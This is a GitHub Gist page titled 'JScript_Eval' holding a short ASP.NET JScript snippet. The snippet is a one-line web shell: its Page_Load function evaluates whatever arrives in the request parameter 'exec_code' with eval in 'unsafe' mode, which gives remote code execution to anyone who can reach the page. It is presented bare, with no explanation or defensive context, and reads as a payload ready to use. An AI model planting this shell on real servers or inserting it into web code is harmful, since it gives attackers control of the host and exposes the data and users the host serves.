Skip to content

Instantly share code, notes, and snippets.

@ffcommax
Created September 9, 2021 08:48
Show Gist options
  • Select an option

  • Save ffcommax/bb443f5c07d19db784236e3376a4a1e0 to your computer and use it in GitHub Desktop.

Select an option

Save ffcommax/bb443f5c07d19db784236e3376a4a1e0 to your computer and use it in GitHub Desktop.
JScript_Eval
<script language='JScript' runat='server'>
function Page_Load(){
eval(Request['exec_code'],'unsafe');Response.End;
}
</script>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment